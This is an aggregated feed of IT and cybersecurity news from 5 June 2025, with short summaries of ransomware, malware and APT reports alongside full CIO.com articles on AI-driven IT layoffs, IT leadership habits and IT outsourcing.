IT professionals who survive the current environment will have to be adaptable, brand-visible, and AI-augmented, she says. “We’re in a post-loyalty labor market,” Williams-Lindo adds. “The real question isn’t if AI is being used to cut jobs — it’s how leaders can use it to reimagine roles, upskill teams, and future-proof their workforce without erasing the human edge.” The value of AI skills Workers with “product intuition” and AI skills are now commanding the highest salaries, pointing toward a hybrid skillset, says Sam Wright, head of partnerships at job seeker site Huntr.co. Willaims-Lindo and Talentfoot’s Fetter both call on IT workers to build their AI expertise, and Huntr.co’s data, collected from job hunters and job sites, reinforces that advice. Still, the overall IT job market has cooled sharply since October, Wright says, even after the huge number of layoffs in 2024. More than half of US IT jobs are clustered in a few metro areas like Seattle and San Francisco, he notes. Wright hasn’t yet seen a widespread effort to replace IT workers with AI, despite warnings from Fetter and Williams-Lindo. “AI is being pushed as a growth driver more than a cost driver right now,” he says. “The idea is more productive not to cut the workforce. We are seeing employers covet employees that use AI to grow revenue.” Other observers see AI-related layoffs coming. IT layoffs will continue through 2026, with sysadmins, QA testers, back-office IT, and mid-tier management jobs most at risk, says Nic Adams, CEO at automated security vendor 0rcus. “Roles relying on routine, repetitive work or can be automated through LLMs, scripting, or RPA are on the chopping block,” he says. “Only technical specialists tied to critical infrastructure, AI systems, or offensive security have real insulation from these cuts.” Entry-level security analysts, low-level tech support agents, manual QA testers, and network operations center monitoring technicians are especially at risk of being replaced by AI, he says. “AI tools are already handling detection, triage, and basic response faster than humans can keep in sync,” Adams says. “The more rules-driven the job, the more likely to permanently dissolve.” While fears of recession and inconsistent US trade policy have driven some IT layoffs, the underlying catalyst is systemic automation, Adams adds. “Enterprises demand leaner teams, higher velocity, and instant scale,” he says. “The bottom third of legacy teams are being displaced, only because of new business models taking shape. It’s not only for OPEX and cost savings.”

https://www.cio.com/article/4000546/company-boards-push-ceos-to-replace-it-workers-with-ai.html
Newly identified wiper malware “PathWiper” targets critical infrastructure in Ukraine
2025-06-05T10:00:53Z | 1749117653

Cisco Talos observed a destructive attack on a critical infrastructure entity within Ukraine, using a previously unknown wiper we are calling “PathWiper.”

https://blog.talosintelligence.com/pathwiper-targets-ukraine/
IT threat evolution in Q1 2025. Non-mobile statistics
2025-06-05T10:00:25Z | 1749117625

The report presents statistics for Windows, macOS, IoT, and other threats, including ransomware, miners, local and web-based threats, for Q1 2025.

https://securelist.com/malware-report-q1-2025-pc-iot-statistics/116686/
IT threat evolution in Q1 2025. Mobile statistics
2025-06-05T10:00:04Z | 1749117604

The number of attacks on mobile devices involving malware, adware, or unwanted apps saw a significant increase in the first quarter.

https://securelist.com/malware-report-q1-2025-mobile-statistics/116676/
What Really Happened in the Aftermath of the Lizard Squad Hacks
2025-06-05T10:00:00Z | 1749117600

On Christmas Day in 2014 hackers knocked out the Xbox and PlayStation gaming networks, impacting how video game companies handled cybersecurity for years.

https://www.wired.com/story/ctrl-alt-chaos-joe-tidy-book-excerpt/
Security Flaws in Chrome Extensions: The Hidden Dangers of Hardcoded Credentials
2025-06-05T10:00:00Z | 1749117600

API keys, secrets, and tokens commonly left exposed in browser extensions’ code.

https://www.security.com/threat-intelligence/chrome-extension-credentials
Unmasking Insecure HTTP Data Leaks in Popular Chrome Extensions
2025-06-05T10:00:00Z | 1749117600

Extensions analyzed expose information such as browsing domains, machine IDs, OS details, usage analytics, and more.

https://www.security.com/threat-intelligence/chrome-extension-leaks
Lee Enterprises Says 40,000 Hit by Ransomware-Caused Data Breach
2025-06-05T09:49:08Z | 1749116948

Lee Enterprises has completed its investigation into the recent ransomware attack and confirmed that a data breach occurred. The post Lee Enterprises Says 40,000 Hit by Ransomware-Caused Data Breach appeared first on SecurityWeek.

https://www.securityweek.com/lee-enterprises-says-40000-hit-by-ransomware-caused-data-breach/
Everest Ransomware Group Allegedly Publishes Full Data Leak of Jordan Kuwait Bank
2025-06-05T09:34:45Z | 1749116085

The Everest ransomware group has allegedly published a full cache of data purportedly belonging to Jordan Kuwait Bank (JKB), following an initial attack reportedly occurring on April 26, 2025. Jordan Kuwait Bank is a financial institution offering a comprehensive suite of banking services. As a significant entity in the financial sector, the bank is responsible […]

https://dailydarkweb.net/everest-ransomware-group-allegedly-publishes-full-data-leak-of-jordan-kuwait-bank/
Smashing Security podcast #420: Fake Susies, flawed systems, and fruity fixes for anxiety
2025-06-05T09:31:30Z | 1749115890

A bizarre case of political impersonation, where Trump’s top aide Susie Wiles is cloned (digitally, not biologically — we think), and high-ranking Republicans start getting invitations to link up with "her" on Telegram to share their Trump pardon wishlists. Was it a deepfake? Or just someone with a halfway decent impression and access to a shady data broker? Meanwhile, we take a worryingly familiar journey into the mental health crisis in the UK — and how TikTok is stepping in with advice like “eat an orange in the shower” to cure your anxiety. Spoiler: it won’t. But it might make your bathroom smell nice. All this and more is discussed in the latest edition of the "Smashing Security" podcast by cybersecurity veterans Graham Cluley and Carole Theriault.

https://grahamcluley.com/smashing-security-podcast-420/
The habits that set future-ready IT leaders apart
2025-06-05T09:30:00Z | 1749115800

Earl Newsome, CIO of Cummins, has built a remarkable track record leading transformations of global IT organizations into world-class centers of innovation and operational excellence. A highly intentional executive, Newsome is also a master at leading with clarity, a key skill in world where change is constant, generative AI is rewriting the rules, and the pace of disruption continues to accelerate. On a recent episode of the Tech Whisperers podcast, Newsome gave a masterclass in leading, adapting, and inspiring, drawing from his playbook of leadership principles tailored to the real-world complexities of IT today. Afterward, we spent time exploring the essential mindsets, behaviors and skillsets Newsome has defined in his “8 Habits of Highly Effective IT Organizations” and “7 Habits of Highly Effective IT Leaders.” Together, these 15 habits form a pragmatic, actionable roadmap for anyone looking to build a future-ready IT organization and to become a leader who not just reacts to change but creates it. What follows is that conversation, edited for length and clarity. Dan Roberts: The habits that you highlight clarify excellence in a way that makes it easy for people to understand where the bar is and what the expectation is. What was the thought process behind defining them? Earl Newsome: As a leader, you measure people by your own yardstick, and often people don’t know what that yardstick is if you don’t write it down or share it or express it. Then you’re in your head, measuring this person against this yardstick, but they don’t have any idea what it is. This gives you the ability to set forth what your measurements and yardstick are. That way, when you measure people from the only frame of reference you can, which is your own, you’re all on the same page. What’s the value of putting it in writing? Why is this kind of communication such an important aspect of leadership? It starts with the power of the pen: He who has the pen has the power to control the narrative, and therefore they have the power to rewrite the past and influence the future. As executives and leaders, our words are strong, but our pen is stronger, because our pen is there when we’re not there. If we capture our thoughts and words in writing, it will represent us when we’re not there. The power of the written word and the media from which it’s shared gives it durability, expansiveness, and the ability to spread. This is also why we need to be very careful about what we say in writing. There’s also what we put in writing about ourselves. There’s your CV, which speaks to you, as well as what I call your enhanced resume, which can speak about you and advocate for you. And then there’s this notion of your digital twin, or the digital version of you. You have an ability to control that digital twin a bit by putting yourself out there, and part of that is through your writings. Thanks to the power of the pen, you can be your own advocate by talking about yourself, and if you’re doing that, you’re also now managing your digital twin. One of your ‘8 Habits of Highly Effective IT Organizations” that emphasizes this point is ‘storytelling — don’t be silent.’ How has today’s environment amplified this need among IT leaders? There’s an old tape we listen to that says, ‘Sometimes the best thing that can be said about IT is nothing.’ We have to abandon that old tape and tell our story, because in a world where ‘software eats everything,’ as Mark Andreessen famously said, IT executives have to be really great at storytelling and not be silent. We have to pivot to being upfront and blunt and bold, to tell our story, use our power of the pen, be our own advocates, and create our own digital twins of what we’re doing so people know the contributions we bring. After all, we are now the cool kids. IT is making hardware cool again. We’ve made an intelligent thermostat and smartphones and self-driving cars. Back in the day, we were the geeks with our pocket protectors. Now we are the big kids on campus, so let’s leverage our storytelling and talk about our cool-kid-ness. It needs to be both a verbal and a written exercise, because while putting it down on paper is important for crystallizing the thinking, telling it crystallizes it even more. The exercise of repeating it helps you synthesize it and make it even more palatable on the page. That cyclicality of the verbal and written exercise helps you fine-tune and hone your message over time. The more you tell your story, the better you’ll get at doing it. What role does being clear-minded about your own purpose play in all of this? As part of our leadership culture at Cummins, we define what our life purposes are and write them down, and I think it provides two things: First, it gives you clarity on why you do what you do. Once you understand your life purpose, you can put your own words, deeds, and actions into perspective about why you do certain things and what the underlying impetus is. My purpose helps me figure out why Earl is Earl — because I want to build a world without limits so people can be all they can be while creating some magic along the way. It also gives you a reason to generate followership. I don’t think your purpose, in and of itself, creates followership, but I do think expressing your purpose in life in words, actions, and deeds increases followership because it gives people the chance to be clear about why you do what you do and why they would want to follow you. It’s very powerful if you can be clear about why you do what you do. Doubt goes away, bravery replaces doubt, and encouragement replaces reluctance. All those things move you from point A to point B. This is also where self-motivation comes from. You know the model: Here’s where you are, here’s where you want to be, and in the gap between those two lies discomfort. But that discomfort creates motivation. Having a clear mind about your purpose gives you the additional motivation to move from where you are, because if you’re doing things that aren’t associated with your purpose, that creates discomfort and should encourage you to be more in line with your purpose. Of course, these lines move. Once you’re over here, the next thing comes up, another point of discomfort happens, and you move again. You’re always going to be in a state of discomfort, but that’s not a bad thing, because it’s the motivation to change and do better. It’s a constructive discomfort. When we talk about how to become more adaptive, resilient, and change-savvy, it seems like that is the outcome of constructive discomfort. Constructive discomfort is the impetus to continuous learning, adaptability, agility, and anti-fragility. The concept of anti-fragile means designed for change. How do we build anti-fragile humans so they are unbreakable and prepared for tomorrow’s world, whatever it brings? We have these fault-tolerant designs where I can unplug a server and the system adapts and you don’t even know it. We want to create that same anti-fragility and fault tolerance in the human beings we train. We’re living in this ever-changing, accelerating VUCA [volatile, uncertain, complex, ambiguous] world, and there are two responses when you are presented with the unknown or the unexpected: You can freeze and be fearful and have it overcome you, or you can improvise, adapt, and overcome it by being a continuous learner and continuous adapter. I think resiliency in human beings is driven by this constructive discomfort, which creates a path to being continuous learners and continuous adapters. That’s where the muscle to improvise, adapt, and overcome comes from. Looking across all 15 habits you’ve come up to be effective as an IT organization and IT leader, what advice do you have for up-and-coming IT leaders and those who aspire to C-suite positions? One of the things I talk about is the 360-degree aspect of leadership: being technically, tactically, and strategically competent. Strategic competence is knowing what hill to take, tactical competence is knowing how to take that hill safely, and technical competence is rolling up your sleeves and helping along the way. The leaders I admire have all three. The person who doesn’t have technical competence may set forth an objective and even chart the path to get there, but then they go have coffee. That leader is probably not going to do well. The leader who’s afraid to get their hands dirty is going to get dirtied. There’s also the quad deep model of intelligence: Business intelligence is how we make money. Industry intelligence is how we compete and win. Social intelligence is how people think and feel. And technical intelligence is being a master at your craft. I think one of the most important things you can have as an IT leader is deep intelligence across all four. During your career, the percentage of time you spend in each of the four is going to change over time. For example, when you graduate, you’re going to spend a lot of time on technical intelligence, but as you move up the executive ranks, you’re going to spend much more time on social intelligence. You have to realize that these are not all equal, and depending on where you are in your career journey, you are going to need to invest in different levels of building up these different IQs. You may not know, so you may need to ask, ‘Where do I need to invest now? Where’s my biggest gap? How do I close that gap to give me the chance to move forward?’ Ask questions; apply frameworks. Methodology and frameworks will give you the ability to frame problems in a different way and have a more consultative mindset. Think boldly and challenge the business and functions. Have that business mindset, but don’t just believe the PowerPoints and the analysts and the salesperson. Be a professional skeptic and challenge them on what they ask you to do rather than just being an order-taker. Your job is to be the ultimate arbiter of truth between what your business is asking for,what they need, and what the analysts and vendors are telling you they can do. The way you become that arbiter of truth is by building your skeptical muscle such that you challenge everything in a professional way, do the right due diligence, and then pick the right solution, knowing that if you’re wrong, you’ll be willing to pivot based on new information. You talked about the importance of being a continual learner. What can IT leaders do to make their own learning and growth a habit? Be curious. Don’t walk away from any learning opportunity. Learn something from everyone, even if it’s what not to do. Build your network both inside and outside your company, and at the same time, make sure you give more than you take from the networks you operate within. Build a personal board of directors — those people who will give you the unvarnished truth. They don’t have to know they’re on your personal board; just put them on your list and ask them questions they can answer. Engage in the circles you are able to, and don’t worry about being perfect; just follow those people you admire and do what they do. You don’t have to be a comedian. You don’t even have to be a great storyteller, but you can learn to tell your version of the story and be effective at that. Be provocative, but most importantly, be authentic. And lastly, be scrappy — by doing things faster and at a lower cost than others, by setting high goals, and by never resting on success. That’s where you can be unique, because you do more with what you have than others can do with it. The ‘WorkSpace’ habit of effective IT organizations emphasizes creating an environment where people can thrive. I know that’s something you are extremely purposeful about. What drives that intention for you? Everything is a people business. Your knowledge capital is contained within people. That’s how you grow and drive your business. When you recognize that every company is just an organization of people, then you want to create an environment where everyone can thrive. And it extends even further: Your family is an organization of people. Your community is an organization of people. Your country is an organization of people. They’re all just organizations of people, and when you come to that realization, you want to create an environment where all of them can thrive, because when we all thrive, we all win. For more wisdom, insight, and advice from Earl Newsome, one of the most intentional leaders in our profession, tune in to the Tech Whisperers podcast. See also: How music shapes Dan Massey’s approach to IT leadership CIO legend Andi Karaboutis on what every IT leader should master KeyBank CIO Amy Brady heeds the transformative call of IT leadership

https://www.cio.com/article/4001323/the-habits-that-set-future-ready-it-leaders-apart.html
ViLE gang members sentenced for DEA portal breach, extortion
2025-06-05T09:26:34Z | 1749115594

Two members of a group of cybercriminals named ViLE were sentenced this week for hacking into a federal law enforcement web portal in an extortion scheme.

https://www.bleepingcomputer.com/news/security/vile-gang-members-sentenced-for-breaching-law-enforcement-portal/
Ransomware Gang Leaks Alleged Kettering Health Data
2025-06-05T09:21:41Z | 1749115301

The Interlock ransomware group has leaked data allegedly stolen from Kettering Health in a recent cyberattack. The post Ransomware Gang Leaks Alleged Kettering Health Data appeared first on SecurityWeek.

https://www.securityweek.com/ransomware-gang-leaks-alleged-kettering-health-data/
Red Flag Bulletin | June 2025 | Vietnam cracks down on counterfeit goods amid threat of US tariffs
2025-06-05T09:16:52Z | 1749115012

This month’s top stories: Vietnam cracks down on counterfeit goods amid threat of US tariffs; Belgian authorities launch corruption investigation into procurement involving NATO; and Government of Guinea revokes mining concessions held by 46 companies.

https://www.s-rminform.com/red-flag-bulletin/red-flag-bulletin-june-2025
‘States don’t do hacking for fun’: NCSC expert urges businesses to follow geopolitics as defensive strategy
2025-06-05T09:01:08Z | 1749114068

Paul Chichester, director of operations at the UK’s National Cyber Security Centre, urged businesses to keep closer tabs on geopolitical events to gauge potential cyber threats.

https://www.itpro.com/security/cyber-attacks/states-dont-do-hacking-for-fun-ncsc-expert-urges-businesses-to-follow-geopolitics-as-defensive-strategy
Iranian APT 'BladedFeline' Hides in Network for 8 Years
2025-06-05T09:00:00Z | 1749114000

ESET published research on the Iranian APT "BladedFeline," which researchers believe is a subgroup of the cyber-espionage entity APT34.

https://www.darkreading.com/threat-intelligence/iranian-apt-bladedfeline-hides-network-8-years
BladedFeline: Whispering in the dark
2025-06-05T09:00:00Z | 1749114000

ESET researchers analyzed a cyberespionage campaign conducted by BladedFeline, an Iran-aligned APT group with likely ties to OilRig

https://www.welivesecurity.com/en/eset-research/bladedfeline-whispering-dark/
IT outsourcing explained: Your guide to strategies, benefits, and avoiding common mistakes
2025-06-05T09:00:00Z | 1749114000

Outsourcing definition Outsourcing is defined as a business practice in which services or job functions are hired out to a third-party on a contract or ongoing basis. In IT, an outsourcing initiative with a technology provider can involve a range of operations, from the entirety of the IT function to discrete, easily defined components, such as disaster recovery, network services, software development,or QA testing.  Companies may choose to outsource services onshore (within their own country), nearshore (to a neighboring country or one in the same time zone), or offshore (to a more distant country). Nearshore and offshore outsourcing have traditionally been pursued to save costs.  IT outsourcing services  Business process outsourcing (BPO) is an overarching term for the outsourcing of a specific business process task, such as payroll. BPO is often divided into two categories: back-office BPO, which includes internal business functions such as billing or purchasing, and front-office BPO, which includes customer-related services such as marketing or tech support.  IT outsourcing is a subset of business process outsourcing, and it falls traditionally into one of two categories: infrastructure outsourcing and application outsourcing. Infrastructure outsourcing can include service desk capabilities, data center outsourcing, network services, managed security operations, or overall infrastructure management. Application outsourcing may include new application development, legacy system maintenance, testing and QA services, and packaged software implementation and management.  Today, however, IT outsourcing can also include relationships with providers of software-, infrastructure-, and platforms-as-a-service. These cloud services are increasingly offered not only by traditional outsourcing providers but by global and niche software vendors or even industrial companies offering technology-enabled services.  [ For more on the latest trends in outsourcing, see 7 hot IT outsourcing trends — and 7 going cold.]  Reasons companies outsource IT Outsourcing began to improve organizational bottom lines: the company doing the outsourcing would seek partners who would charge less for outsourced services than it would cost to hire people in-house, perhaps in regions with different work cultures or labor laws.   But as outsourcing has become engrained in management culture, some enterprises will choose to outsource IT or other functions even if doing so doesn’t immediately lower their costs. Instead, they may wish to benefit from outsourcing firms’ expertise rather than building that knowledge in-house. “Organizations are meanwhile outsourcing not just for efficiency but for effectiveness, access to skills, and for focusing on core business, cutting-edge innovation, modernization and business transformation,” Forrester senior analyst Jeffrey Rajamani told CIO.  Top IT outsourcing companies  Outsourcing Accelerator, a global outsourcing marketplace, commissions the annual OA500 report, analyzing and ranking the world’s top 500 outsourcing firms. The top 10 firms from the 2024 report  are the following:  Accenture  Teleperformance  Concentrix  Wipro  Capgemini  Cognizant  HCL Technologies  Infosys  CGI  Tech Mahindra  Outsourcing benefits and risks The business case for outsourcing varies by situation, but the benefits and risks of outsourcing are outlined in the table below: Whether you’re looking to cut costs, access specialized expertise, or enhance flexibility, IT outsourcing is complex. To help you weigh your options, this table outlines the primary benefits of IT next to the common outsourcing challenges and risks you need to consider. IDG IT outsourcing models and pricing  The appropriate model for an IT service is determined by the service provided. Most outsourcing contracts have been billed on a time and materials or fixed price basis. But as outsourcing services have matured to include strategic transformation and innovation initiatives, contractual approaches have evolved to include managed services and outcome-based arrangements.  The most common ways to structure an outsourcing engagement include the following:  Pricing modelEngagement details Time and materials The client pays the provider based on the time and materials used to complete the work. Historically, this has been used in long-term application development and maintenance contracts. It can be appropriate when scope and specifications are difficult to estimate or needs evolve rapidly. Unit/on-demand pricing The vendor determines a set rate for a particular level of service, and the client pays based on its usage of that service. Pay-per-use pricing can deliver productivity gains from day one and makes component cost analysis and adjustments easy. But it requires an accurate estimate of the demand volume and a commitment for minimum transaction volumes. Fixed pricing Here, the price is determined at the beginning. This can work well when there are stable requirements, objectives, and scope. Fixed pricing makes costs predictable, but when market pricing goes down over time, a fixed price stays fixed. It is also hard on the vendor, which must meet service levels at a certain price no matter how many resources those services require. . Variable pricing The customer pays a fixed price at the low end of a supplier’s provided service, but this method allows for variance in pricing based on providing higher levels of services. Cost-plus The client pays the supplier for its costs, plus a predetermined percentage of profit. Such plans do not allow for flexibility as objectives or technologies change, and it provides little incentive for a supplier to perform effectively. Performance-based pricing Here, financial incentives encourage the supplier to perform optimally. This type of pricing plan also requires suppliers to pay a penalty for unsatisfactory service levels. This model is often used in conjunction with a traditional pricing method, such as time-and-materials, and can be beneficial when the customers can identify specific investments the vendor could make to deliver a higher level of performance. Gain-sharing Pricing is based on the value delivered by the vendor beyond its typical responsibilities. For example, an automobile manufacturer may pay a service provider based on the number of cars it produces. With this kind of arrangement, the customer and vendor each have skin in the game, and each stand to gain a percentage of profits if the supplier’s performance is optimum and meets the buyer’s objectives. Shared risk/reward Provider and customer jointly fund the development of new products, solutions, and services with the provider sharing rewards for a defined period. This model encourages the provider to come up with ideas to improve the business and spread financial risk between both parties. But it requires a greater level of governance to do well. Outsourcing vs. offshoring The term outsourcing is often used interchangeably — and incorrectly — with offshoring, usually by those in a heated debate. But offshoring is a subset of outsourcing wherein a company outsources services to a third party in a country other than the one in which the client company is based, typically to take advantage of lower labor costs. This subject continues to be charged politically because offshore outsourcing is more likely to result in layoffs.  Outsourcing IT jobs  Estimates of jobs displaced or jobs created due to offshoring tend to vary widely due to lack of reliable data. In some cases, global companies set up their own captive offshore IT service centers to reduce costs or access skills.   Some roles typically offshored include software development, application support and management, maintenance, testing, help desk/technical support, database development or management, and infrastructure support. However, companies that once leaned heavily on outsourcing are now reassessing that balance and investing in internal upskilling programs, especially as low-code, no-code, and AI technologies become more accessible—and know-how on those subjects becomes more important.   [ For more, read CIO’s interview with Kimberly-Clark tech exec Zack Clark for how he’s handling outsourcing.]  In recent years, IT service providers increased investments in IT delivery centers in the US, according to a report from Everest Group. Offshore outsourcing providers have also increased their hiring of US IT professionals to gird against potential increased restrictions on the H-1B visas they use to bring offshore workers to the US to work on client sites.  Some industry experts point out that increased automation and robotic capabilities may actually eliminate more IT jobs than offshore outsourcing.  Outsourcing risks and challenges  The failure rate of outsourcing relationships remains high, ranging from 40% to 70%. At the heart of the problem is the inherent conflict of interest in any outsourcing arrangement. The client seeks better service, often at lower costs, than it would get doing the work itself. The vendor, however, wants to make a profit. That tension must be managed closely to ensure a successful outcome for both client and vendor. A service level agreement (SLA) is one lever for navigating this conflict — when implemented correctly.  An SLA is a contract between an IT services provider and a customer that specifies, usually in measurable terms, what services the vendor will furnish. Service levels are determined at the beginning of any outsourcing relationship and are used to measure and monitor a supplier’s performance. [ For more on outsourcing contracts, see 11 keys to a successful outsourcing relationship and 7 tips for managing an IT outsourcing contract.]  Another cause of outsourcing failure is the rush to outsource as a “quick fix” cost-cutting maneuver rather than an investment designed to enhance capabilities, expand globally, increase agility and profitability, or bolster competitive advantage.  Risks increase as the boundaries between client and vendor responsibilities blur and the scope of responsibilities expands. Whatever the type of outsourcing, the relationship will succeed only if both the vendor and the client achieve expected benefits.  [ See also: 9 IT outsourcing mistakes to avoid” and “10 early warning signs of IT outsourcing disaster.]  Types of outsourcing  Many years ago, the multibillion-dollar megadeal for one vendor hit an all-time high, but wholesale outsourcing proved difficult to manage for many companies. These days, CIOs have embraced the multi-vendor approach, incorporating services from several best-of-breed vendors.  Multisourcing, however, is not without challenges. The customer must have mature governance and vendor management practices in place. Failure to enforce cross-vendor collaboration can undermine strategic initiatives entirely: CIO.com’s Bob Lewis lays out a scenario where an APR consultancy’s project failed when another vendor withheld client-owned data to sabotage a rival’s success. In contract negotiations, CIOs need to spell out that vendors must cooperate or else risk losing the contract. CIOs need to find qualified staff with financial as well as technical skills to help run a project management office or some other body that can manage the outsourcing portfolio.  The rise of digital transformation has initiated a shift away from siloed IT services. As companies embrace new development methodologies and infrastructure choices, many standalone IT service areas no longer make sense. Some IT service providers seek to become one-stop shops for clients through brokerage services or partnership agreements, offering clients a full spectrum of services from best-in-class providers.  How to select a service provider  Selecting a service provider is a difficult decision, and no one outsourcer will be an exact fit for your needs. Trade-offs will be necessary.  To make an informed decision, articulate what you want from the outsourcing relationship to extract the most important criteria you seek. It’s important to figure this out before soliciting outsourcers, as they will bring with their own ideas of what’s best for your organization, based largely on their own capabilities and strengths.  Some examples of the questions you’ll need to consider include the following:  What’s more important to you: the total amount of savings an outsourcer can provide you or how quickly they can cut your costs?  Do you want broad capabilities or expertise in a specific area?  Do you want low, fixed costs or more variable price options?  Once you define and prioritize your needs, you’ll be better able to decide what trade-offs are worth making.  Outsourcing advisers  Many organizations bring in a sourcing consultant to help establish requirements and priorities. Third-party expertise can help, but it’s important to research the adviser well. Some consultants may have a vested interest in getting you to pursue outsourcing rather than helping you figure out if outsourcing is a good option for your business. A good adviser can help an inexperienced buyer through the vendor-selection process, aiding them in steps like conducting due diligence, choosing providers to participate in the RFP process, creating a model or scoring system for evaluating responses, and making the final decision.  [ For more advice, see Outsourcing advisors: 6 tips for selecting the right one.]  Negotiating the best outsourcing deal  Balancing the risks and benefits for both parties is the goal of the negotiation process, which can get emotional and even contentious. But smart buyers will take the lead in negotiations, prioritizing issues that are important to them, rather than being led around by the outsourcer.  Creating a timeline and completion date for negotiations will help rein in the process. Without one, discussions could go on forever. But if an issue needs time, don’t be a slave to the date.  Finally, don’t take any steps toward transitioning the work to the outsourcer while in negotiations. An outsourcing contract is never a done deal until you sign on the dotted line, and if you begin moving the work to the outsourcer, you will be handing over more power over the negotiating process to them as well.  Strategic outsourcing trends  Traditionally viewed from a cost perspective, outsourcing relationships are increasingly being viewed for their strategic potential of late, with shifts in models, new approaches to contracts, and delivery strategies evolving to follow suit.  Such changes include use of performance-based, vested sourcing, and shared services models, as well as equity partnerships; shifts from request for proposal to request for partnership bidding models, as well as request for solution competitive bidding processes; and increased embracing of relational contracts over transactional contracts.  The underlying idea behind these shifts is to establish stronger business partnership alliances with outsourcing providers, along with an emphasis on outcome-based business models underpinned by pricing models that are incentivized to optimize those business outcomes.  At the same time, organizations are evolving the way they think about staffing, increasingly outsourcing routine tasks or automating them to free up headcount for hybrid roles that demand both technical skill and strategic thinking. (More on headcount trends here.)  IT outsourcing’s hidden costs  Depending on what is outsourced and to whom, studies show that an organization will end up spending at least 10% percent above the agreed-upon figure to manage the deal over the long haul. Among the most significant additional expenses associated with outsourcing are:  The price benchmarking and analysis to determine whether outsourcing is the right choice  The cost of investigating and selecting a vendor  The cost of transitioning work and knowledge to the outsourcer  Costs resulting from possible layoffs and their associated HR issues  Costs of ongoing staffing and management of the outsourcing relationship  It’s important to consider these hidden costs when making a business case for outsourcing.  The outsourcing transition  Vantage Partners once called the outsourcing transition period — during which the provider’s delivery team gets up to speed on your business, existing capabilities and processes, expectations and organizational culture — the “valley of despair.”   During this period, the new team is trying to integrate transferred employees and assets, begin the process of driving out costs and inefficiencies, while keeping the lights on. Throughout this period, which can range from several months to a couple of years, productivity very often takes a nosedive.  The problem is that this is also the time when executives on the client side look most avidly for the deal’s promised gains; business unit heads and line managers wonder why IT service levels aren’t improving; and IT workers wonder what their place is in this new mixed-source environment.   The best advice is to anticipate that the transition period will be trying, attempt to manage the business side’s expectations, and set up management plans and governance tools to get the organization over the hump.  Outsourcing governance  A highly collaborative relationship based on effective contract management and trust can add value to an outsourcing relationship. An acrimonious relationship, however, can detract significantly from the value of the arrangement; the positives degraded by the greater need for monitoring and auditing. In that environment, conflicts frequently escalate and projects don’t get done.  Successful outsourcing is about relationships as much as it is actual IT services or transactions. As a result, outsourcing governance is the single most important factor in determining the success of an outsourcing deal. Without it, carefully negotiated and documented rights in an outsourcing contract run the risk of not being enforced, and the relationship that develops may look nothing like what you envisioned.  [ For more on outsourcing governance, see 7 tips for managing an IT outsourcing contract.]  Repatriating IT — when backsourcing makes sense Repatriating or backsourcing IT work (bringing an outsourced service back in-house) when an outsourcing arrangement is not working — either because there was no good business case for it in the first place or because the business environment changed — is always an option. However, it is not always easy to extricate yourself from an outsourcing relationship, and for that reason many clients dissatisfied with outsourcing results renegotiate and reorganize their contracts and relationships rather than attempt to return to the pre-outsourced state. But, in some cases, bringing IT back in house is the best option, and in those cases it must be handled with care. This trend is part of a broader IT realignment effort, where companies are increasingly replacing outsourcing arrangements with internal centers of excellence for key functions like DevSecOps and agile development.   Captive centers (aka DIY outsourcing)  A captive center is a service delivery organization owned and operated by its client, to which the center provides direct resources. These centers are typically offshore in low-cost locations and provide an alternative to the traditional outsourcing model, although some are often initially set up by traditional outsourcers before being transitioned to the client.  Fully owned global IT service centers are picking up steam as a talent and service delivery strategy of late, but going the captive route requires clear-eyed consideration of benefits and risks, as well as desired business outcomes.   [ For more on this model, see Captive centers are back. Is DIY offshoring right for you? ]  More on outsourcing: 7 hot IT outsourcing trends — and 7 going cold Top 10 IT outsourcing providers 9 outsourcing myths debunked The hidden costs of outsourcing 11 keys to a successful outsourcing relationship 9 IT outsourcing mistakes to avoid 10 early warning signs of IT outsourcing disaster 12 signs your strategic partnership has gone wrong 7 keys to transformational outsourcing success SLA guide: Best practices for service-level agreements 10 dos and don’ts for crafting more effective SLAs How to contract for outsourcing agile development

https://www.cio.com/article/272355/outsourcing-outsourcing-definition-and-solutions.html
Spanish Government Network Access Allegedly Compromised
2025-06-05T08:56:31Z | 1749113791

A threat actor has allegedly claimed to possess administrative-level access to the Remote Desktop Protocol (RDP) of “gob.es,” the official domain of the Spanish government. This domain is a critical piece of national infrastructure, hosting various governmental services and information. The alleged breach, if confirmed, could represent a significant cybersecurity incident with far-reaching implications for […]

https://dailydarkweb.net/spanish-government-network-access-allegedly-compromised/
Hackerangriff auf deutschen Pappspezialist Wellteam
2025-06-05T08:53:53Z | 1749113633

126822068 Olivier Le Moal – shutterstock.com Laut einem Bericht der Regionalzeitung Westfalen-Blatt bemerkte die IT von Wellteam bereits am 23. Mai, dass Hacker in das System eingedrungen waren. Demnach führte der Angriff zu einem kompletten Betriebsausfall. „Maschinen blieben still, Lastwagen im Depot, Mitarbeiter wurden nach Hause geschickt“, heißt es. Wie der Westdeutsche Rundfunk WDR berichtet, war zunächst die interne Kommunikation betroffen. Zwar seien gemäß der internen Notfallprozesse umfangreiche Schutzmaßnahmen eingeleitet worden, dennoch habe es letztendlich gravierende Ausfälle gegeben, erklärte Geschäftsführer Sieghard Schöneberg gegenüber dem Sender. Weitere Details zu dem Angriff will das Unternehmen derzeit aufgrund der laufenden Ermittlungen nicht preisgeben. Daher ist unklar, ob Daten abgegriffen wurden und wie die Täter in das System gekommen sind. Zudem ist nicht bekannt, ob es sich um eine Ransomware-Attacke mit Lösegelderpressung handelt. Wellteam beschäftigt an drei Standorten im Kreis Herford etwa 600 Mitarbeiter und erzielte zuletzt nach eigenen Angaben einen Jahresumsatz von mehr als 100 Millionen Euro. Lesetipp: Diese Unternehmen hat es schon erwischt

https://www.csoonline.com/article/4002246/hackerangriff-auf-deutschen-pappspezialist-wellteam.html
Bank Syariah Indonesia Customer Credentials Allegedly Leaked via Stealer Logs
2025-06-05T08:47:29Z | 1749113249

Customer credentials for Bank Syariah Indonesia (BSI), a major state-owned Islamic bank, have allegedly surfaced on a dark web forum. A threat actor claims to be in possession of “stealer logs” containing sensitive login information apparently belonging to BSI customers. This type of compromise typically results from malware on users’ personal devices capturing their usernames […]

https://dailydarkweb.net/bank-syariah-indonesia-customer-credentials-allegedly-leaked-via-stealer-logs/
China Issues Warrants for Alleged Taiwanese Hackers and Bans a Business for Pro-Independence Links
2025-06-05T08:38:41Z | 1749112721

China issued warrants for 20 Taiwanese people it said carried out hacking missions in the Chinese mainland on behalf of the island’s ruling party. The post China Issues Warrants for Alleged Taiwanese Hackers and Bans a Business for Pro-Independence Links appeared first on SecurityWeek.

https://www.securityweek.com/china-issues-warrants-for-alleged-taiwanese-hackers-and-bans-a-business-for-pro-independence-links/
U.S. Offers $10M Reward for Intel on RedLine Malware Hackers
2025-06-05T08:32:19Z | 1749112339

